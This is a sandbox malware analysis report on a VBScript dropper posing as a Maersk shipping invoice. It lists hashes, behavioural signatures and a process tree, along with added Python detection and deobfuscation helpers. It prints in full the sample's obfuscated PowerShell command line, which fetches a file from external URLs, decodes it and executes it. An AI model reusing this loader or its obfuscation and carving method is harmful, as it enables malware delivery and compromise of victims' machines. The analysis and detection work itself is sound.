Analysis

max time kernel: 149s
max time network: 150s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted: 02-07-2024 16:14

Static task: static1
Behavioral task: behavioral1
  Sample: Maersk_Shipping_Invoice_Awb_Packinglist_pdf.vbs
  Resource: win7-20240508-en
Behavioral task: behavioral2
  Sample: Maersk_Shipping_Invoice_Awb_Packinglist_pdf.vbs
  Resource: win10v2004-20240508-en

General

Target: Maersk_Shipping_Invoice_Awb_Packinglist_pdf.vbs
Size: 22KB
MD5: af8e905368962cfb4873c41a77b4515c
SHA1: 577337de5d106e6b11225be7c362f33a8d5c0831
SHA256: bde3493e67a6088d2d265ca765e9aba6f98cc45eb933d5f00f498ffac84711a3
SHA512: 8fca68d732a9db1a4a6d9b955a361a5bd37bdd7c994e9094b31799cc7c4c6448fc620d2bf8928532a261680c78e8e138f0b960d9fa630dfc0b4e51c7e756a9c2
SSDEEP: 384:KlzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgwwfEa+MCq22HX:6zSR022X/523S0e8xPPmra+Mq01N
Malware Config
Signatures
Blocklisted process makes network request (64 IoCs)
  powershell.exe (pid 2672): network flows 5, 6, 7, 8 and 10 through 69 (64 flows in total)

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (1 IoC)
  powershell.exe (pid 2672)

Suspicious use of AdjustPrivilegeToken (1 IoC)
  powershell.exe (pid 2672): Token: SeDebugPrivilege

Suspicious use of WriteProcessMemory (6 IoCs)
  PID 2548 (WScript.exe) wrote to memory of 2672 (powershell.exe): 3 events
  PID 2672 (powershell.exe) wrote to memory of 2028 (cmd.exe): 3 events
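The WriteProcessMemory signature above records the full chain WScript.exe (2548) -> powershell.exe (2672) -> cmd.exe (2028). The following detection sketch is an added example, not part of this sandbox report or of any vendor rule set: it scores constructed process-creation events for that chain using command-line idioms that are visible in the PowerShell command line further down (a method name held in a variable and called through .Invoke(), the call operator applied to a variable, a string literal split and re-joined with +=, and cmd.exe being used only to echo %appdata%). The event records, weights and threshold are constructed for illustration; PIDs 2548, 2672 and 2028 and the image paths follow the report, while explorer.exe as the root parent (pid 1201), the benign events, and the short replica PowerShell command line are assumptions.

```python
"""Added detection sketch for the WScript.exe -> powershell.exe -> cmd.exe chain.
Constructed example; not the sandbox's own logic."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
THRESHOLD = 3  # constructed; tune against real telemetry

# (compiled pattern, weight, reason) -- idioms seen in this report's PowerShell command line
INDICATORS = [
    (re.compile(r"\.\$\w+\.Invoke\("), 2,
     "method name held in a variable and called via .Invoke()"),
    (re.compile(r"&\s*\(\s*\$\w+\s*\)"), 2,
     "call operator applied to a variable (indirect Invoke-Expression)"),
    (re.compile(r"'[A-Za-z]{3,}'\s*;\s*\$\w+\s*\+=\s*'[A-Za-z]+'"), 1,
     "string literal split and re-joined with +="),
]

def basename(path: str) -> str:
    """Lower-cased file name of an image path (handles both slash styles)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event."""
    score, reasons = 0, []
    image, parent = basename(ev["image"]), basename(ev["parent_image"])
    if image == "powershell.exe":
        if parent in SCRIPT_HOSTS:
            score += 2
            reasons.append(f"{parent} spawned powershell.exe")
        for pattern, weight, reason in INDICATORS:
            if pattern.search(ev["cmdline"]):
                score += weight
                reasons.append(reason)
    elif image == "cmd.exe" and parent == "powershell.exe" \
            and re.search(r"echo\s+%appdata%", ev["cmdline"], re.I):
        # In this report cmd.exe exists only to expand %appdata% for its PowerShell parent.
        score += 1
        reasons.append("cmd.exe used to expand %appdata% for a PowerShell parent")
    return score, reasons

def detect(events: list[dict], threshold: int = THRESHOLD) -> dict[int, list[str]]:
    """Map pid -> reasons for every event scoring at or above the threshold."""
    flagged = {}
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged[ev["pid"]] = reasons
    return flagged

def related_children(events: list[dict], flagged: dict) -> dict[int, list[int]]:
    """Direct children of flagged processes, so a low-scoring helper such as
    the cmd.exe here still lands in the same incident."""
    return {pid: sorted(ev["pid"] for ev in events if ev["ppid"] == pid) for pid in flagged}

# Constructed replica of the obfuscation pattern (not the sample's own command line).
MAL_PS_CMDLINE = (
    "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" "
    "\"cls;write 'Stumpnser Midernes';$h='SUBsTRI';$h+='ng';"
    "Function D($s){For($i=1;$i -lt $s.Length-1;$i+=2){$o+=$s.$h.Invoke($i,1)};$o};"
    "$x=D '.iYe.xr ';& ($x) (D 'S> ');\""
)

# Constructed events. explorer.exe as root parent (pid 1201) and the last two events are assumptions.
EVENTS = [
    {"pid": 2548, "ppid": 1201, "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WScript.exe",
     "cmdline": "\"C:\\Windows\\System32\\WScript.exe\" "
                "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Maersk_Shipping_Invoice_Awb_Packinglist_pdf.vbs\""},
    {"pid": 2672, "ppid": 2548, "parent_image": "C:\\Windows\\System32\\WScript.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": MAL_PS_CMDLINE},
    {"pid": 2028, "ppid": 2672,
     "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "image": "C:\\Windows\\system32\\cmd.exe",
     "cmdline": "\"C:\\Windows\\system32\\cmd.exe\" /c \"echo %appdata%\\Proskriberes.Bet && echo t\""},
    # benign: a scripted backup launched from the desktop
    {"pid": 3100, "ppid": 1201, "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    # admin one-liner that also uses the call operator on a variable: stays below threshold
    {"pid": 3310, "ppid": 3300, "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command \"$sb='Get-Date';& ($sb)\""},
]

if __name__ == "__main__":
    hits = detect(EVENTS)
    for pid, reasons in hits.items():
        print(pid, reasons, "children:", related_children(EVENTS, hits)[pid])
```

Only pid 2672 crosses the threshold; the cmd.exe child scores 1 on its own and is pulled in through related_children, while the admin one-liner that happens to use `& ($sb)` scores 2 and is left alone. The weights are deliberately conservative because each indicator has legitimate uses; it is the combination with a script-host parent that makes the chain in this report stand out.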
Processes

depth 1: C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Maersk_Shipping_Invoice_Awb_Packinglist_pdf.vbs"
- Suspicious use of WriteProcessMemory

depth 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighederne ' $Eg l oAbTaUli: BCa.nodTh.oUoFk =H$ tDr u eP ') ;Opdateringsprogrammet $Nourishments;Opdateringsprogrammet (Brandmyndighederne ' SBtFa,r tS-TS l.eSeUp 4L ');Opdateringsprogrammet (Brandmyndighederne ' $.gPl o,bMa,l,: A.s,p eTrAsii.oPn s,2,3 =H(ST eBsFtS-PPAa t hi H$RH,j lBp eVp rSsPtse rBs ), ') ;Opdateringsprogrammet (Brandmyndighederne 'E$OgCl o.b aLl.:AFPu,gFtUi gUh e,dMsHcFr eYmFeSrPnReP= $UgKl.oFbIaSlC:.MIiUd 
eArRnFe.sF+ + %,$.t iFl kVa,l dStIeP. cTo uSnAtO ') ;$Lancinated=$tilkaldte[$Fugtighedscremerne];}$Spidskandidaternes=331099;$Amphitoky=27737;Opdateringsprogrammet (Brandmyndighederne 'D$,g lPoFbSa l :DFMa,t,t i,gUfBiBn t O=. KGFe,tI-FCBo n.tAe.n t. ,$MHMjSl,pVeSpAr.s t.e.r.sD ');Opdateringsprogrammet (Brandmyndighederne 'A$ gSlRo b.aSl.:.O rUaBt o r iKcAaUlSlEyg T=G L[JSVy s tSeRmE.iC.o.nCv eHrAtF] :.:FF r o mIB a.s eP6O4 SFt r i,n g.( $ FIaht.t,iTgAf i.nTts)H ');Opdateringsprogrammet (Brandmyndighederne 'R$GgBl oTbta lJ:.RSu d yKaSrbdB =O F[PSCy.sFtVeEm,. T e.x.t . E n c,oAd,i nTg ].:,:LA,SBCUI,Im.EG ert S tYrSi,n,gu( $ O rAa tTo,r iLc a.lslMyD)e ');Opdateringsprogrammet (Brandmyndighederne 'F$Tg.l,oLbEa lZ:FB e sTt iBlSl e rF=.$,RTuRdHy a r,dF.Fs.u,bUs,tUrCi nNg,(D$.S p,i,d s,kFaMnPdei,dDa t e r nEe.sN,F$KAEm p h.iBt o.k,yE)T ');Opdateringsprogrammet $Bestiller;"
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory

depth 3: C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
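The PowerShell command line above carries its own decoder. `Brandmyndighederne` computes `$eventyrroman = Length - $Anthranyl`, where `$Anthranyl` is `$null` incremented once (because `$host.CurrentCulture` is set) and so equals 1; the loop `For($Daghesh=1; $Daghesh -lt $eventyrroman; $Daghesh+=2)` then appends `Substring($Daghesh, 1)`, i.e. every odd-indexed character. Each literal is therefore cleartext interleaved with one junk character per real character, and `Opdateringsprogrammet` runs the result through the call operator with `$Androlepsia` as the command. The final stage reads the dropped file with Get-Content, Base64-decodes it, takes it as ASCII and executes a `Substring($Spidskandidaternes, $Amphitoky)` window, i.e. 27737 characters starting at offset 331099. The helper below is an added analyst example, not code from the report or the sample. Only three short literals are taken from the command line (`'S> '`, `'.iYe.xr '` and `'.URs e rC-KA g.e,n tI '`); the longer literals as printed on this page appear to have had runs of spaces collapsed and do not decode cleanly, so every other input below, including the junk alphabet, the `interleave` encoder and the Base64 blob, is constructed.

```python
"""Added analyst helper reproducing the two decoding steps in this report's
PowerShell command line. Constructed example; not the sample's own code."""
import base64

def deinterleave(s: str) -> str:
    """Port of Brandmyndighederne with $Anthranyl == 1: keep the characters
    at odd positions 1, 3, 5, ... strictly below len(s) - 1."""
    return s[1:len(s) - 1:2]

# Short literals copied from the report's command line. They contain single
# spaces only, so the page's whitespace damage cannot have altered them.
REPORT_LITERALS = {
    "shrugging": "S> ",                      # separator of the URL list
    "Androlepsia": ".iYe.xr ",               # command handed to the call operator
    "Maltreated": ".URs e rC-KA g.e,n tI ",  # HTTP header name set on the WebClient
}

def decode_report_literals() -> dict:
    return {name: deinterleave(raw) for name, raw in REPORT_LITERALS.items()}

JUNK = "ABCDEFGHIJKLMNOPQRSTUVWXYZ.,;: "  # constructed junk alphabet

def interleave(clear: str) -> str:
    """Constructed encoder producing the same layout (junk, then char/junk
    pairs). A stand-in for building test data, not the actor's build tool."""
    out = [JUNK[0]]
    for i, ch in enumerate(clear):
        out.append(ch)
        out.append(JUNK[(i + 1) % len(JUNK)])
    return "".join(out)

# Stage-2 carve parameters exactly as they appear in the command line.
STAGE_OFFSET = 331099   # $Spidskandidaternes
STAGE_LENGTH = 27737    # $Amphitoky

def stage_window_fits(decoded_len: int, offset: int, length: int) -> bool:
    """String.Substring throws ArgumentOutOfRangeException when the window
    overruns the string; Python slices silently truncate, so check first."""
    return offset >= 0 and length >= 0 and offset + length <= decoded_len

def carve_stage(b64_text: str, offset: int, length: int) -> str:
    """[Convert]::FromBase64String -> [Text.Encoding]::ASCII.GetString ->
    .Substring(offset, length), as chained in the command line."""
    decoded = base64.b64decode(b64_text).decode("ascii", errors="replace")
    if not stage_window_fits(len(decoded), offset, length):
        raise ValueError("Substring window out of range (PowerShell would throw)")
    return decoded[offset:offset + length]

def build_constructed_blob(payload: str, offset: int, tail: int) -> str:
    """Constructed stand-in for the dropped file: filler, payload, filler,
    Base64-encoded the way the real download is consumed."""
    blob = ("J" * offset) + payload + ("K" * tail)
    return base64.b64encode(blob.encode("ascii")).decode("ascii")

if __name__ == "__main__":
    print(decode_report_literals())
    payload = "Write-Host 'stage 2'"
    b64 = build_constructed_blob(payload, 4096, 512)
    print(carve_stage(b64, 4096, len(payload)))
```

Running `deinterleave` over the rest of the command line needs the literals exactly as the sandbox captured them, not as rendered here; when pulling them from the raw report, keep every space. The same routine also shows why the loop at the end of the command line matters for containment: as decoded from the literals, it retries `DownloadFile` against the next entry of the `>`-separated URL list every 4 seconds until `Test-Path` on the dropped file succeeds, so blocking a single host does not stop the download.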
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads (memory dumps, all from powershell.exe pid 2672)

memory/2672-4-0x000007FEF56BE000-0x000007FEF56BF000-memory.dmp    4KB
memory/2672-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp    2.9MB
memory/2672-6-0x0000000001E80000-0x0000000001E88000-memory.dmp    32KB
memory/2672-7-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp    9.6MB
memory/2672-8-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp    9.6MB
memory/2672-9-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp    9.6MB
memory/2672-10-0x000007FEF56BE000-0x000007FEF56BF000-memory.dmp   4KB
memory/2672-11-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp   9.6MB